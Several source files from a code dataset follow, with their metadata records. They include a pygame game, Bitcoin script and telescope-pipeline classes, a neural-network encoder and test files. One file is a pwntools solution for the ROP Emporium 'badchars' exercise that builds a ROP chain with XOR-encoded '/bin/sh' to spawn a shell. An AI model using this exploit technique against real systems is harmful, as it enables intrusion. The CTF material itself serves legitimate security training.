(startX, startY), (vertexX, vertexY) = getRanStartAndVertexPos()\n left, top = gameScreenRect.topleft\n return Fruit(images, (startX, startY), (vertexX, vertexY), isBomb)\n\ndef reconfigFruitPos(posX, posY, oldGameScreenRect): # scales the positions of coordinates appropriately when screen size changes\n global gameScreenRect, resizeGameScreenRect\n\n factorLengthX = gameScreenRect.w/oldGameScreenRect.w\n factorLengthY = gameScreenRect.h/oldGameScreenRect.h\n #print(factorLengthY)\n #print(factorLengthX)\n resizeGameScreenRect = oldGameScreenRect\n newPosX, newPosY = factorLengthX*posX, factorLengthY*posY\n return newPosX, newPosY\n\ndef getRanStartAndVertexPos():\n global gameScreenRect\n\n left, top = gameScreenRect.topleft\n left, bottom = gameScreenRect.bottomleft\n w, h = gameScreenRect.w, gameScreenRect.h\n ranStartXAdd, ranStartYAdd = randint(35, w-35), h - 35\n ranVertexXAdd, ranVertexYAdd = randint(30, h-30), randint(30, h - 60)\n img = pygame.image.load('ClassicPotato-1.png')\n return img, (ranStartXAdd, ranStartYAdd), (ranVertexXAdd, ranVertexYAdd)\n\ndef redrawScreen():\n DISPLAYSURF.fill(BLACK)\n drawScreenArea(True)\n\ndef getFactorLength():\n factorLength = windowWidth\n\n if windowWidth >= windowHeight:\n factorLength = windowHeight\n else:\n factorLength = windowWidth\n return factorLength\n\ndef drawCursorTrail(): # if the cursor speed is greater than minSpeed, then a trail will for behind it until it's greater than a certain amount\n global cursorSpeed\n particles = []\n particles.append()\n\n\ndef getCursorSpeedIsFast(initialMousePos, curMousePos): # every 200 milliseconds, the mouse should have moved past at least 100 pixels\n\n xInitial, yInitial = initialMousePos\n xCur, yCur = curMousePos\n xDif = abs(xCur - xInitial)\n yDif = abs(yCur - yInitial)\n distance = math.sqrt(xDif*xDif + yDif*yDif)\n cursorSpeed = distance, 200 # cursor speed is distance/200 millaseconds\n if distance > 185:\n return True\n else:\n return False\n\ndef drawScreenArea(booDraw):\n global gameScreenRect\n\n gameScreenRect = None\n factorLength = getFactorLength()\n img = pygame.image.load('choppingBoard.png')\n\n remainder = int(factorLength * 80 / 81) % 15\n length = int(factorLength * 80 / 81) - remainder\n img = pygame.transform.smoothscale(img, (length, length))\n img.get_rect().center = (int(windowWidth / 2), int(windowHeight / 2))\n gameScreenRect = img.get_rect()\n gameScreenRect.center = (int(windowWidth / 2), int(windowHeight / 2))\n left, top = gameScreenRect.topleft\n if booDraw == True:\n DISPLAYSURF.blit(img, (left, top))\n\ndef determineMode(position):\n global DISPLAYSURF\n xPos, yPos = position\n if openScreenRects[0].collidepoint(xPos, yPos):\n DISPLAYSURF.fill(BLACK)\n return True\n else:\n return False\n\ndef openingScreen(bool):\n global DISPLAYSURF, openingFONT, windowWidth, windowHeight, openScreenRects, factor, rootGroup\n openScreenRects.clear();\n color1 = GREY\n color2 = BLACK\n factorW = windowWidth / 500\n factorH = windowHeight / 500\n factor = factorW\n if factorH <= factorW:\n factor = factorH\n if bool == True:\n color1 = BLACK\n color2 = GREY\n\n openingFONT = pygame.font.SysFont('chiller', int(factor * 110))\n DISPLAYSURF.fill(BLACK)\n textSurface = openingFONT.render('Root Ninja:', True, color1, color2)\n textRect = textSurface.get_rect()\n textRect.center = (int(windowWidth / 2), int(windowHeight / 2))\n openScreenRects.append((textRect))\n DISPLAYSURF.blit(textSurface, textRect)\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\ndef resetVariables():\n global isFast, openScreenRects, gameStarted, gameScreenRect, resizeGameScreenRect, oldFactorLength, rootGroup,\\\n livesLeft, score\n\n #isFast = False\n #openScreenRects = [] # stores rectangles of the opening screen\n gameStarted = False # when is gameStarted is False, start screen appears\n #gameScreenRect = None\n #resizeGameScreenRect = None\n #oldFactorLength = 1\n #rootGroup = pygame.sprite.Group()\n rootGroup.empty()\n score = 0\n livesLeft = 3\n\n\ndef main():\n global DISPLAYSURF, windowWidth, windowHeight, gameStarted, isFast, score, livesLeft, rootGroup\n my_eventTime = USEREVENT + 1\n pygame.time.set_timer(my_eventTime, 200)\n changeEventTime = True\n openingScreen(True)\n titleBool = True\n initMousePosX, initMousePosY = pygame.mouse.get_pos()\n pygame.mouse.set_cursor(*pygame.cursors.broken_x)\n drawScreenArea(False)\n oldGameScreenRect = None\n\n collideLine = None\n\n fruitSpawnTimer = 2000 # when fruitSpawnTimer time has elapsed, a new fruit should spawn\n startTics = pygame.time.get_ticks()\n\n while True:\n\n for event in pygame.event.get():\n\n if livesLeft <= 0 and gameStarted == True:\n drawXLives()\n pygame.display.update()\n pygame.time.wait(2000)\n resetVariables()\n changeEventTime = True\n gameStarted = False\n pygame.time.set_timer(my_eventTime, 0)\n pygame.time.set_timer(my_eventTime, 200)\n fruitSpawnTimer = 2000\n\n if gameStarted == True and changeEventTime == True:\n changeEventTime = False\n pygame.time.set_timer(my_eventTime, 0)\n pygame.time.set_timer(my_eventTime, 150)\n initMousePosX, initMousePosY = pygame.mouse.get_pos()\n\n if gameStarted == True and event.type == my_eventTime:\n redrawScreen()\n oldGameScreenRect = gameScreenRect\n drawScore()\n drawXLives()\n checkComboPoints()\n removeRoots()\n moveAllRoots()\n rootGroup.draw(DISPLAYSURF) # draws the roots\n rootGroup.update()\n drawBlackOutsideOfGSR()\n\n\n if gameStarted == True and pygame.time.get_ticks() - startTics >= fruitSpawnTimer:\n startTics = pygame.time.get_ticks()\n fruitSpawnTimer = randint(80, 2000)\n rootGroup.add(addNewRanRoot())\n\n if gameStarted == False and event.type == pygame.MOUSEBUTTONDOWN:\n gameStarted = determineMode(pygame.mouse.get_pos())\n startTics = pygame.time.get_ticks()\n\n if event.type == my_eventTime and gameStarted == False:\n titleBool = not titleBool\n openingScreen(titleBool)\n\n if event.type == QUIT:\n terminate()\n\n if event.type == pygame.VIDEORESIZE: # Allows resizing screen\n DISPLAYSURF = pygame.display.set_mode((event.w, event.h), pygame.RESIZABLE)\n windowWidth, windowHeight, = event.w, event.h\n\n if gameStarted == True:\n redrawScreen()\n reconfigAllRootsPosAndSize(oldGameScreenRect)\n oldGameScreenRect = gameScreenRect\n\n if event.type == my_eventTime and pygame.mouse.get_pressed()[0]:\n pygame.draw.aaline(DISPLAYSURF, RED, (initMousePosX, initMousePosY), (pygame.mouse.get_pos()), 6)\n curPos = pygame.mouse.get_pos()\n\n isFast = getCursorSpeedIsFast((initMousePosX, initMousePosY), curPos)\n if isFast == True:\n checkMouseRootCollide(initMousePosX, initMousePosY, curPos)\n\n initMousePosX, initMousePosY = pygame.mouse.get_pos()\n #print(str(isFast))\n\n if event.type == my_eventTime:\n initMousePosX, initMousePosY = pygame.mouse.get_pos()\n\n\n pygame.display.update()\n FPSCLOCK.tick(FPS)\n\n\n# RUN MAIN\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n","sub_path":"RootNinjaGame/backuppe.py","file_name":"backuppe.py","file_ext":"py","file_size_in_byte":22709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"435607474","text":"from aiobitcoin.tools.intbytes import byte2int\n\nfrom ..script import tools\n\nfrom ...serialize import b2h\n\nfrom .ScriptType import ScriptType\n\nfrom aiobitcoin.tools.contrib import segwit_addr\n\n\nclass ScriptPayToScriptWit(ScriptType):\n def __init__(self, version, hash256):\n assert len(version) == 1\n assert isinstance(version, bytes)\n assert len(hash256) == 32\n assert isinstance(hash256, bytes)\n version_int = byte2int(version)\n assert 0 <= version_int <= 16\n\n self.version = version_int\n self.hash256 = hash256\n self._address = None\n self._script = None\n\n @classmethod\n def from_script(cls, script):\n if len(script) != 34 or script[0:2] != b'\\00\\x20':\n raise ValueError(\"bad script\")\n\n return cls(script[:1], script[2:])\n\n def solve(self, **kwargs):\n \"\"\"\n p2sh_lookup:\n dict-like structure that returns the underlying script for the given hash256\n \"\"\"\n from . import script_obj_from_script\n p2sh_lookup = kwargs.get(\"p2sh_lookup\")\n\n if p2sh_lookup is None:\n raise ValueError(\"p2sh_lookup (with hash256) not set\")\n\n underlying_script = p2sh_lookup.get(self.hash256)\n if underlying_script is None:\n raise ValueError(\"underlying script cannot be determined for %s\" % b2h(self.hash256))\n\n script_obj = script_obj_from_script(underlying_script)\n\n kwargs[\"signature_for_hash_type_f\"] = kwargs[\"signature_for_hash_type_f\"].witness\n kwargs[\"script_to_hash\"] = underlying_script\n kwargs[\"existing_script\"] = tools.bin_script(kwargs[\"existing_witness\"])\n underlying_solution = script_obj.solve(**kwargs)\n # we need to unwrap the solution\n solution = []\n pc = 0\n\n while pc < len(underlying_solution):\n opcode, data, pc = tools.get_opcode(underlying_solution, pc)\n solution.append(data)\n\n solution.append(underlying_script)\n return (b\"\", solution)\n\n def script(self):\n if self._script is None:\n # create the script\n STANDARD_SCRIPT_OUT = \"OP_0 %s\"\n script_text = STANDARD_SCRIPT_OUT % b2h(self.hash256)\n self._script = tools.compile(script_text)\n\n return self._script\n\n def info(self, netcode=None):\n def address_f(netcode=netcode):\n from aiobitcoin.tools.networks import bech32_hrp_for_netcode\n from aiobitcoin.tools.networks.default import get_current_netcode\n\n if netcode is None:\n netcode = get_current_netcode()\n\n bech32_hrp = bech32_hrp_for_netcode(netcode)\n address = segwit_addr.encode(bech32_hrp, self.version, self.hash256)\n return address\n\n return dict(type=\"pay to witness script hash\", address=\"DEPRECATED call address_f instead\",\n address_f=address_f, hash256=self.hash256, script=self._script)\n\n def __repr__(self):\n return \"\" % self.address()\n","sub_path":"aiobitcoin/tools/tx/pay_to/ScriptPayToScriptWit.py","file_name":"ScriptPayToScriptWit.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"42206161","text":"# -*- coding: utf-8 -*-\nx=int(input('digite o valor:'))\nsoma=0\nfor i in range(1,x,1):\n if x%i==0:\n print(i)\n soma=soma+i\nif soma==x:\n print('perfeito')\nelse:\n print('não perfeito')","sub_path":"moodledata/vpl_data/129/usersdata/235/33677/submittedfiles/al7.py","file_name":"al7.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"422103008","text":"from pwn import *\n\n#0x0000000000400b30 : xor byte ptr [r15], r14b ; ret\n#0x0000000000400b40 : pop r14 ; pop r15 ; ret\n#0x0000000000400b39 : pop rdi ; ret\n#0x0000000000400b34 : mov qword ptr [r13], r12 ; ret\n#0x0000000000400b3b : pop r12 ; pop r13 ; ret\n\nbad_chars=['b', 'i', 'c', '/' ,' ','f','n','s']\n\nCALL_SYSTEM=0x004006f0\nSTR_ADDR=0x00601100\nSET_RDI=0x00400b39\nSET_XOR_REGS = 0x00400b40\nXOR_BYTES=0x00400b30\nSET_REGS=0x00400b3b\nWRITE_MEM=0x00400b34\n\nxor_key=0x12\n\ndef write_str(s,addr,exp):\n #write 8 byte string with bad chars\n exp+=p64(SET_REGS)\n s=list(s)\n xored_s=[chr(ord(ch)^xor_key) if ch in bad_chars else ch for ch in s]\n exp+=\"\".join(xored_s)\n exp+=p64(addr)\n exp+=p64(WRITE_MEM)\n for ch in s:\n if ch in bad_chars:\n exp+=p64(SET_XOR_REGS)\n exp+=chr(xor_key)+\"\\x00\"*7\n exp+=p64(addr)\n exp+=p64(XOR_BYTES)\n addr+=1\n\n return exp\n\nr=process(\"./badchars\")\nexploit=b'A'*40\nexploit=write_str(\"/bin/sh\\x00\",STR_ADDR,exploit)\nexploit+=p64(SET_RDI)\nexploit+=p64(STR_ADDR)\nexploit+=p64(CALL_SYSTEM)\nr.sendline(exploit)\nr.interactive()\n","sub_path":"ROP Emporium[badchars-64bit]/pwn_badchars.py","file_name":"pwn_badchars.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"307220062","text":"\"\"\"Association Definitions: DMS Level3 product associations\n\"\"\"\nimport logging\n\nfrom jwst.associations.lib.rules_level3_base import *\n\n# Configure logging\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n# --------------------------------\n# Start of the User-level rules\n# --------------------------------\n\n\n# ----------------------------------\n# Image associations\nclass Asn_Image(\n AsnMixin_Image,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"Non-Association Candidate Dither Associations\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'pointing_type': {\n 'value': 'SCIENCE',\n 'inputs': ['PNTGTYPE']\n },\n 'wfsvisit': {\n 'value': 'NULL',\n 'inputs': ['WFSVISIT'],\n },\n })\n\n # Now check and continue initialization.\n super(Asn_Image, self).__init__(*args, **kwargs)\n\n def _init_hook(self, member):\n \"\"\"Post-check and pre-add initialization\"\"\"\n\n self.data['asn_type'] = 'image'\n super(Asn_Image, self)._init_hook(member)\n\n\nclass Asn_WFSCMB(\n AsnMixin_Image,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"Wavefront Sensing association\n\n Notes\n -----\n Defined by `TRAC issue #269 `_\n \"\"\"\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'wfsvisit': {\n 'value': '(?!NULL).+',\n 'inputs': ['WFSVISIT'],\n },\n 'asn_candidate_wfs': {\n 'value': '.+MOSAIC.+',\n 'inputs': ['ASN_CANDIDATE'],\n 'force_unique': True,\n 'is_acid': True,\n },\n 'activity_id': {\n 'value': None,\n 'inputs': ['ACT_ID']\n }\n })\n\n # Now check and continue initialization.\n super(Asn_WFSCMB, self).__init__(*args, **kwargs)\n\n def _init_hook(self, member):\n \"\"\"Post-check and pre-add initialization\"\"\"\n\n self.data['asn_type'] = 'wfs'\n super(Asn_WFSCMB, self)._init_hook(member)\n\n\n# Spectrographic Associations\nclass Asn_MIRI_LRS_FIXEDSLIT(\n AsnMixin_Spectrum,\n AsnMixin_MIRI,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"MIRI LRS Fixed slit\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'patttype': {\n 'value': None,\n 'inputs': ['PATTTYPE'],\n 'force_unique': True\n },\n 'exp_type': {\n 'value': 'MIR_LRS-FIXEDSLIT',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': 'P750L',\n 'inputs': ['FILTER']\n },\n 'subarray': {\n 'value': 'FULL',\n 'inputs': ['SUBARRAY']\n }\n })\n\n # Check and continue initialization.\n super(Asn_MIRI_LRS_FIXEDSLIT, self).__init__(*args, **kwargs)\n\n\nclass Asn_MIRI_LRS_SLITLESS(\n AsnMixin_Spectrum,\n AsnMixin_MIRI,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"MIRI LRS Slitless\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'exp_type': {\n 'value': 'MIR_LRS-SLITLESS',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': 'P750L',\n 'inputs': ['FILTER']\n },\n 'subarray': {\n 'value': 'SUBPRISM',\n 'inputs': ['SUBARRAY']\n }\n })\n\n # Check and continue initialization.\n super(Asn_MIRI_LRS_SLITLESS, self).__init__(*args, **kwargs)\n\n\nclass Asn_NIR_SO_SLITLESS(\n AsnMixin_Spectrum,\n AsnMixin_NIRISS,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"NIRISS Single-Object Slitless\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'detector': {\n 'value': 'NIS',\n 'inputs': ['DETECTOR']\n },\n 'exp_type': {\n 'value': 'NIS_SOSS',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': 'GR700XD',\n 'inputs': ['PUPIL']\n },\n 'subarray': {\n 'value': 'FULL|SUBSTRIP256|SUBSTRIP80',\n 'inputs': ['SUBARRAY'],\n 'force_unique': True\n }\n })\n\n # Check and continue initialization.\n super(Asn_NIR_SO_SLITLESS, self).__init__(*args, **kwargs)\n\n\nclass Asn_NRS_FIXEDSLIT(\n AsnMixin_Spectrum,\n AsnMixin_NIRSPEC,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"NIRSPEC Fixed Slit\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'exp_type': {\n 'value': 'NRS_FIXEDSLIT',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': None,\n 'inputs': ['FILTER']\n },\n 'opt_elem2': {\n 'value': None,\n 'inputs': ['GRATING']\n },\n 'fixed_slit': {\n 'value': None,\n 'inputs': ['FXD_SLIT']\n },\n 'subarray': {\n 'value': None,\n 'inputs': ['SUBARRAY']\n },\n })\n\n # Check and continue initialization.\n super(Asn_NRS_FIXEDSLIT, self).__init__(*args, **kwargs)\n\n\nclass Asn_NRS_MSA(\n AsnMixin_Spectrum,\n AsnMixin_NIRSPEC,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"NIRSPEC MSA\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'pointing_type': {\n 'value': 'SCIENCE',\n 'inputs': ['PNTGTYPE']\n },\n 'exp_type': {\n 'value': 'NRS_MSASPEC',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': None,\n 'inputs': ['FILTER']\n },\n 'opt_elem2': {\n 'value': None,\n 'inputs': ['GRATING']\n },\n })\n\n # Check and continue initialization.\n super(Asn_NRS_MSA, self).__init__(*args, **kwargs)\n\n\nclass Asn_MIRI_MRS(\n AsnMixin_Spectrum,\n AsnMixin_MIRI,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"MIRI MRS (IFU)\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'exp_type': {\n 'value': 'MIR_MRS',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': None,\n 'inputs': ['BAND']\n },\n })\n\n # Check and continue initialization.\n super(Asn_MIRI_MRS, self).__init__(*args, **kwargs)\n\n\nclass Asn_NRS_IFU(\n AsnMixin_Spectrum,\n AsnMixin_NIRSPEC,\n AsnMixin_Target,\n AsnMixin_Unique_Config\n):\n \"\"\"NIRSPEC IFU\"\"\"\n\n def __init__(self, *args, **kwargs):\n\n # Setup for checking.\n self.add_constraints({\n 'exp_type': {\n 'value': 'NRS_IFU',\n 'inputs': ['EXP_TYPE']\n },\n 'opt_elem': {\n 'value': None,\n 'inputs': ['GRATING']\n }\n })\n\n # Check and continue initialization.\n super(Asn_NRS_IFU, self).__init__(*args, **kwargs)\n\n def _init_hook(self, member):\n \"\"\"Post-check and pre-add initialization\"\"\"\n\n self.data['asn_type'] = 'nrsifu'\n super(AsnMixin_Spectrum, self)._init_hook(member)\n","sub_path":"jwst/associations/lib/rules_level3.py","file_name":"rules_level3.py","file_ext":"py","file_size_in_byte":8063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"537489091","text":"#20\nori = input().split(\",\")\ndic = {}\nminNum = 0\nfor item in ori:\n if item not in dic:\n dic[item] = 1\n else:\n dic[item] += 1\nfor item in dic:\n ordinary = int(item) + 1\n \n minNum += ordinary\nprint(minNum)","sub_path":"Code/CodeRecords/2238/60771/270765.py","file_name":"270765.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"292586892","text":"\"\"\"CNN for image processing.\"\"\"\n\nfrom typing import List, Tuple, Type, Optional\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.contrib.layers import conv2d, max_pool2d, batch_norm\n\nfrom neuralmonkey.checking import assert_shape\nfrom neuralmonkey.dataset import Dataset\nfrom neuralmonkey.encoders.attentive import Attentive\nfrom neuralmonkey.decoding_function import Attention\nfrom neuralmonkey.model.model_part import ModelPart, FeedDict\nfrom neuralmonkey.nn.projection import multilayer_projection\nfrom neuralmonkey.nn.utils import dropout\n\n\nclass CNNEncoder(ModelPart, Attentive):\n \"\"\"An image encoder.\n\n It projects the input image through a serie of convolutioal operations. The\n projected image is vertically cut and fed to stacked RNN layers which\n encode the image into a single vector.\n\n Attributes:\n input_op: Placeholder for the batch of input images\n padding_masks: Placeholder for matrices capturing telling where the\n image has been padded.\n image_processing_layers: List of TensorFlow operator that are\n visualizable image transformations.\n encoded: Operator that returns a batch of ecodede image (intended\n as an input for the decoder).\n attention_tensor: Tensor computing a batch of attention\n matrices for the decoder.\n train_mode: Placeholder for boolean telleing whether the training\n is running.\n \"\"\"\n\n # pylint: disable=too-many-arguments, too-many-locals\n def __init__(self,\n name: str,\n data_id: str,\n convolutions: List[Tuple[int, int, Optional[int]]],\n image_height: int, image_width: int, pixel_dim: int,\n fully_connected: Optional[List[int]] = None,\n batch_normalization: bool = True,\n local_response_normalization: bool = True,\n dropout_keep_prob: float = 0.5,\n attention_type: Type = Attention,\n save_checkpoint: Optional[str] = None,\n load_checkpoint: Optional[str] = None) -> None:\n \"\"\"Initialize a convolutional network for image processing.\n\n Args:\n convolutions: Configuration of convolutional layers. It is a list\n of triplets of integers where the values are: size of the\n convolutional window, number of convolutional filters, and size\n of max-pooling window. If the max-pooling size is set to None,\n no pooling is performed.\n data_id: Identifier of the data series in the dataset.\n image_height: Height of the input image in pixels.\n image_width: Width of the image.\n pixel_dim: Number of color channels in the input images.\n batch_normalization: Flag whether the batch normalization\n should be used between the convolutional layers.\n local_response_normalization: Flag whether to use local\n response normalization between the convolutional layers.\n dropout_keep_prob: Probability of keeping neurons active in\n dropout. Dropout is done between all convolutional layers and\n fully connected layer.\n \"\"\"\n ModelPart.__init__(self, name, save_checkpoint, load_checkpoint)\n Attentive.__init__(self, attention_type)\n\n self.data_id = data_id\n self.dropout_keep_prob = dropout_keep_prob\n\n with self.use_scope():\n self.train_mode = tf.placeholder(tf.bool, shape=[],\n name=\"train_mode\")\n self.input_op = tf.placeholder(\n tf.float32,\n shape=(None, image_height, image_width, pixel_dim),\n name=\"input_images\")\n\n self.padding_masks = tf.placeholder(\n tf.float32,\n shape=(None, image_height, image_width, 1),\n name=\"padding_masks\")\n\n last_layer = self.input_op\n last_padding_masks = self.padding_masks\n\n self.image_processing_layers = [] # type: List[tf.Tensor]\n\n with tf.variable_scope(\"convolutions\"):\n for i, (filter_size,\n n_filters,\n pool_size) in enumerate(convolutions):\n with tf.variable_scope(\"cnn_layer_{}\".format(i)):\n last_layer = conv2d(last_layer, n_filters, filter_size)\n self.image_processing_layers.append(last_layer)\n\n if pool_size:\n last_layer = max_pool2d(last_layer, pool_size)\n self.image_processing_layers.append(last_layer)\n last_padding_masks = max_pool2d(\n last_padding_masks, pool_size)\n\n if local_response_normalization:\n last_layer = tf.nn.local_response_normalization(\n last_layer)\n\n if batch_normalization:\n last_layer = batch_norm(\n last_layer, is_training=self.train_mode)\n\n last_layer = dropout(last_layer, dropout_keep_prob,\n self.train_mode)\n\n # last_layer shape is batch X height X width X channels\n last_layer = last_layer * last_padding_masks\n\n # pylint: disable=no-member\n last_height, last_width, last_n_channels = [\n s.value for s in last_layer.get_shape()[1:]]\n # pylint: enable=no-member\n\n if fully_connected is None:\n # we average out by the image size -> shape is number\n # channels from the last convolution\n self.encoded = tf.reduce_mean(last_layer, [1, 2])\n assert_shape(self.encoded, [None, convolutions[-1][1]])\n else:\n last_layer_flat = tf.reshape(\n last_layer,\n [-1, last_width * last_height * last_n_channels])\n self.encoded = multilayer_projection(\n last_layer_flat, fully_connected,\n activation=tf.nn.relu,\n dropout_keep_prob=self.dropout_keep_prob,\n train_mode=self.train_mode)\n\n self.__attention_tensor = tf.reshape(\n last_layer, [-1, last_width * last_height, last_n_channels])\n\n self.__attention_mask = tf.reshape(\n last_padding_masks, [-1, last_width * last_height])\n\n @property\n def _attention_tensor(self) -> tf.Tensor:\n return self.__attention_tensor\n\n @property\n def _attention_mask(self) -> tf.Tensor:\n return self.__attention_mask\n\n def feed_dict(self, dataset: Dataset, train: bool = False) -> FeedDict:\n # if it is from the pickled file, it is list, not numpy tensor,\n # so convert it as as a prevention\n images = np.array(dataset.get_series(self.data_id))\n\n f_dict = {}\n f_dict[self.input_op] = images / 225.0\n\n # it is one everywhere where non-zero, i.e. zero columns are masked out\n f_dict[self.padding_masks] = \\\n np.sum(np.sign(images), axis=3, keepdims=True)\n\n f_dict[self.train_mode] = train\n return f_dict\n","sub_path":"neuralmonkey/encoders/cnn_encoder.py","file_name":"cnn_encoder.py","file_ext":"py","file_size_in_byte":7443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"387889243","text":"from demo.Data_fetcher import Data_fetcher\n\n\nclass House_price_prediction:\n price_list = []\n area_list = []\n training_data_file_path = \"\"\n\n def __init__(self, file_path):\n training_data = Data_fetcher.get_input(file_path)\n self.area_list = training_data.area_list\n self.price_list = training_data.price_list\n self.training_data_file_path = file_path\n print(self.area_list)\n print(self.price_list)\n\n\n\n\n\nhouse_price_prediction = House_price_prediction(\"./house_pricing_linear_regression.csv\")\n\n\n","sub_path":"demo/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"183392026","text":"\ndef distinct_ab(file_name_a, file_name_b):\n str1 = []\n str2 = []\n str_dump = []\n with open(\"{}\".format(file_name_a), 'r') as fa, \\\n open(\"{}\".format(file_name_b), 'r') as fb, \\\n open(\"不同的文件.txt\", 'w+') as fc,\\\n open(\"相同的文件.txt\", 'w+') as fd:\n\n # 将A.txt的内容逐行读到str1中\n for line in fa.readlines():\n str1.append(line.replace(\"\\n\", ''))\n # 将B.txt中的内容逐行读到str2中\n for line in fb.readlines():\n str2.append(line.replace(\"\\n\", ''))\n\n # 将两个文件中重复的行,添加到str_dump中\n for i in str1:\n if i in str2:\n str_dump.append(i)\n\n # 将两个文件的行合并,并去重\n str_all = set(str1 + str2)\n\n # 将重复的行,在去重的合并行中,remove掉,剩下的就是不重复的行了\n for i in str_dump:\n fd.write(i + '\\n')\n if i in str_all:\n str_all.remove(i)\n # 写行文件中\n for i in list(str_all):\n fc.write(i + '\\n')\n\n print('提取{}文件和{}文件的不同文件成功'.format(file_name_a, file_name_b))\n\n\nif __name__ == '__main__':\n print('******************程序开始********************')\n print('本程序可以比较两个文件,并将不同的内容提取单独保存')\n print(' ')\n while True:\n try:\n print('请确保需要对比提取的两个文件与程序在同一目录')\n a = str(input('请输入第一个文件名称和后缀并回车:'))\n b = str(input('请输入第二个文件名称和后缀并回车:'))\n distinct_ab(a, b)\n print(' ')\n print('***************程序结束*****************')\n break\n except :\n print('文件不存在,输入有误,请重新输入!!!')\n q = int(input('输入0退出程序,输入1继续:'))\n if q == 0:\n print(' ')\n print('******************程序结束********************')\n break\n else:\n continue\n","sub_path":"distinct.py","file_name":"distinct.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"560416600","text":"import random\n\n# вивести суму кожного 3, 5, 9 елемента від 0 - 100\nfor i in (3, 5, 9):\n print(sum(range(1, 101, i)))\n\n# 1 line\n# for n in (3, 5, 9): print(sum(range(1,101,n)))\n\n# Є словник | ключ- без різниці | value - 20 елементів інтові\n# | вивести ключі трьох найбільший значень в порядку зростання значень\nmy_dict = dict((key, random.randint(0, 100)) for key in range(20))\nprint(my_dict)\n\nres = sorted(my_dict.items(),\n key=lambda item: item[1], reverse=True)[:3:]\nfor k, _ in res:\n print(k)\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"137039908","text":"# pylint: disable=missing-docstring\nfrom decimal import Decimal\n\nfrom beancount.core import realization\nfrom flask import g\n\nfrom fava.core.accounts import AccountData\nfrom fava.core.inventory import CounterInventory\nfrom fava.core.tree import TreeNode\nfrom fava.template_filters import basename\nfrom fava.template_filters import collapse_account\nfrom fava.template_filters import format_currency\nfrom fava.template_filters import format_errormsg\nfrom fava.template_filters import get_or_create\nfrom fava.template_filters import remove_keys\nfrom fava.template_filters import should_show\n\n\ndef test_remove_keys() -> None:\n \"\"\"Dict keys get remove or return empty dict if None is given.\"\"\"\n assert remove_keys(None, []) == {}\n assert remove_keys({\"asdf\": 1}, [\"asdf\"]) == {}\n\n\ndef test_format_currency(app) -> None:\n with app.test_request_context(\"/long-example/\"):\n app.preprocess_request()\n assert format_currency(Decimal(\"2.12\")) == \"2.12\"\n assert format_currency(Decimal(\"2.13\"), invert=True) == \"-2.13\"\n\n\ndef test_basename():\n \"\"\"Get the basename of a file path.\"\"\"\n assert basename(__file__) == \"test_template_filters.py\"\n\n\ndef test_get_or_create(example_ledger):\n assert (\n get_or_create(example_ledger.root_account, \"\")\n == example_ledger.root_account\n )\n assert get_or_create(\n example_ledger.root_account, \"Expenses\"\n ) == realization.get(example_ledger.root_account, \"Expenses\")\n\n\ndef test_should_show(app):\n with app.test_request_context(\"/long-example/\"):\n app.preprocess_request()\n assert should_show(g.ledger.root_tree.get(\"\")) is True\n assert should_show(g.ledger.root_tree.get(\"Expenses\")) is True\n\n account = TreeNode(\"name\")\n assert should_show(account) is False\n account.balance_children = CounterInventory({(\"USD\", None): 9})\n assert should_show(account) is True\n with app.test_request_context(\"/long-example/income_statement/?time=2100\"):\n 